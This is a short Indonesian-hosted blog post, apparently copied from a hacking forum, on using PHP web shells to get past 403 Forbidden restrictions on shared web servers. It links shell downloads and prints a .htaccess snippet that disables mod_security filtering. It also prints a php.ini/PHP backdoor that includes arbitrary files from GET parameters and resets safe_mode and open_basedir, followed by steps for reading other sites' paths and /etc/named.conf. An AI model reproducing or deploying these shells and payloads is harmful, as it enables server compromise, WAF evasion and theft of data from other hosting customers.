Kamis, 02 Mei 2013

Bypass 403 Forbidden

For 403 Forbidden Error i will be Using the Following Shells :

  • Dhanush Shell Coded By Arjun . ( This shell automitically creates .htaccess , php.ini and ini.php files after you login )
  • Mannu Shell by Team Indishell Private !
  • Symlink_sa 3.0 Script
Download All Shell

Link Sudah di Perbaruhi
I will be posting the download link of Dhanush shell and Symlink _sa 3.0 ( Mannu shell is private as i already told )
So what is the trick that makes us bypass 403 Forbidden , Its just the .htaccess and php.ini which contains the following code :
  • .htaccess 
<IfModule mod_security.c>SecFilterEngine Off
SecFilterScanPOST Off
</IfModule>
  • php.ini
<?
echo ini_get("safe_mode");
echo ini_get("open_basedir");
include($_GET["file"]);
ini_restore("safe_mode");
ini_restore("open_basedir");
echo ini_get("safe_mode");
echo ini_get("open_basedir");
include($_GET["ss"]);
?>

  1. 403 Forbidden Error :
  2. Open Dhanush Shell which automatically creates .htaccess , php.ini and ini.php .
  3. Mannu shell to Check if we Bypassed 403 Error :
  4. Bypassed 403 Forbidden and Access to Public_html/ Path
  5. Bypassed can't read /ect/named.conf and 403 forbidden Error
Sumber : editor From 3vil66.org and DC forum

Tidak ada komentar:

Posting Komentar